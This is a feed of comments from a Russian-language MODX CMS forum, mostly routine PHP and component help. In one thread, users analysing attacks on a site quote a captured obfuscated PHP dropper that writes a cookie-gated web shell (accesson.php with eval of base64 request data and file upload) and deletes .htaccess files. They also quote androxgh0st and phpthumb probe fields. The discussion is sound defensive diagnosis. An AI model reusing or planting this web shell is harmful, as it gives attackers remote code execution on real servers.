Всего 123 782 комментария

Артур Шевченко
13 марта 2024, 22:14
0
Есть вероятность, что 4 цифры приходят в таком формате 1 000, что преобразуется в 1, а вот если вырезать пробелы, то и проблемы не будет.
Алексей Соин
13 марта 2024, 17:58
+1
Добавлю ещё пример на tailwind.
Виталий
13 марта 2024, 11:40
0
Приветствую.

Решил обновить компонент, однако в версии 2.0.14-pl должна быть минимальная версия php 7.4 судя по изменениям, однако там все еще 8.1 при проверке. Как можно решить?
Андрей
13 марта 2024, 11:12
0
там еще нужно заменить
ord($c{1})
на
ord($c[1])
и
ord($c{2})
на
ord($c[2])
и
ord($c{3})
на
ord($c[3])
Андрей
13 марта 2024, 11:02
0
проблема, судя по всему, до сих пор актуальна, на php 8.2
Василий Наумкин
13 марта 2024, 10:34
0
Стоит еще добавить, что если сайт использует современнный CSS фреймворк, то он уже может поддерживать тёмный режим из коробки.

Например, вот как это работает в Bootstrap 5.3.
Дима Касаткин
12 марта 2024, 16:14
+1
Сбор завершен (на самом деле давно, но я что-то забыл здесь отписаться).
Спасибо всем кто участвовал! Вместе мы делаем MODX лучше и удобнее, и это круто!

Все собранные донаты отправились в пользу автора компонента-преемника: FileMan by @Наумов Алексей!
Сергей
12 марта 2024, 15:42
0
К сожалению это не помогло, то один начинает работать, то другой. В один моменте смог добиться работы и того и другого, только, когда авторизован и то процент скидки рассчитывался не верно.
Сергей
12 марта 2024, 15:17
0
Большое спасибо, нужно было прописать до обработки $dst
Наумов Алексей
12 марта 2024, 14:47
0
и в src и в dst что-то типа (только не помню MODX_BASE_PATH слеш содержит уже или нет).
$src = MODX_BASE_PATH . '/assets/images/image.jpg';
$dst = MODX_BASE_PATH . '/assets/images/image-new.jpg';
Сергей
12 марта 2024, 14:41
0
Спасибо! Я попробовал этот код, к сожалению, как есть он не сработал )
в $src нужно передавать относительный путь картинки или абсолютный?
результат попадает в $dst?
Наумов Алексей
12 марта 2024, 14:35
+1
как-то так:

// подключаем phpthumb
require_once MODX_CORE_PATH.'model/phpthumb/phpthumb.class.php';
// создаем объект phpThumb
$phpThumb = new phpThumb();
// задаем имя файла
$phpThumb->setSourceFilename($src);
// параметры
$phpThumb->setParameter('w', 100);
$phpThumb->setParameter('h', 150);
// генерируем файл
if ($phpThumb->GenerateThumbnail()){
  if ($phpThumb->RenderToFile($dst)) {
    // превью сохранено!
  }
}
Арман
12 марта 2024, 14:18
0
Почему-то берет во внимания &emailSubject=`Обратный звонок` но игнорирует &emailTpl=`TplEmailcallbackform`. Я исправил validate=`phoneform: required` добавил к нему & возможно из-за этого как-то некорректно работало.
Наумов Алексей
12 марта 2024, 14:00
0
большой вопрос — почему в почту попадает вот это а не содержимое чанка письма…
Артур Шевченко
12 марта 2024, 13:25
0
Это всё попытки взлома. Скорее всего бомбят action.php. Вариант защиты использовать токен. Можешь попробовать использовать SendIt.
Арман
12 марта 2024, 13:05
0
Я посмотрел вроде он также пытался создать пользователя но у него не получилось. Sql-иньекцию пытались сделать только 1 раз 11 марта судя по почте. С этим всё понятно а что значат остальные сообщения. Которые приходят уже почти неделю с разным временем и количеством каждый день. Такие вот 3 сообщения

debug: true

0x:androxgh0st

config_prefer_imagemagick: 0
src: http
f: php
action: web/phpthumb
useRawIMoutput: 1
IMresizedData:
Наумов Алексей
12 марта 2024, 12:42
0
Хорошо бы отловить запросы на сервер и данные в них, которые приводят к такому поведению.

А так да, прям попыточка взломать всё.

К примеру видны попытки вытащить таблицу пользователей, попытки создания сниппетов, типа такого

$s = $_SERVER['DOCUMENT_ROOT'].'/assets/';$s1 = $s.'images/';mkdir($s1,511);$fh = fopen($s1.'accesson.php', 'w');fwrite($fh, '<?=409723*20;if(md5($_COOKIE[d])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x36\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST[id]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?>');fclose($fh);unlink($s.'.htaccess');unlink($s1.'.htaccess');
беглый поиск по «accesson.php» показывает, что так ломали сайты на modx еще с версии 2,6,4, когда были уязвимости найдены…
Наумов Алексей
12 марта 2024, 12:36
0
Касательно второй строчки здесь
2. Цвет
— Красный
— Синий, Красный
— Синий
стоит посмотреть на параметр values_delimeter сниппета mFilter2. В нем по умолчанию запятая, и такая же запятая стоит в значении опции. Я в этом параметре обычно указываю точку с запятой.
Арман
12 марта 2024, 11:19
0
SQL-инъекции начали приходить недавно. А до этого приходило следующее.

12:50
config_prefer_imagemagick: 0
src: http
f: php
action: web/phpthumb
useRawIMoutput: 1
IMresizedData:
Артур Шевченко
12 марта 2024, 09:28
+1
Больше похоже на попытку SQL-инъекции.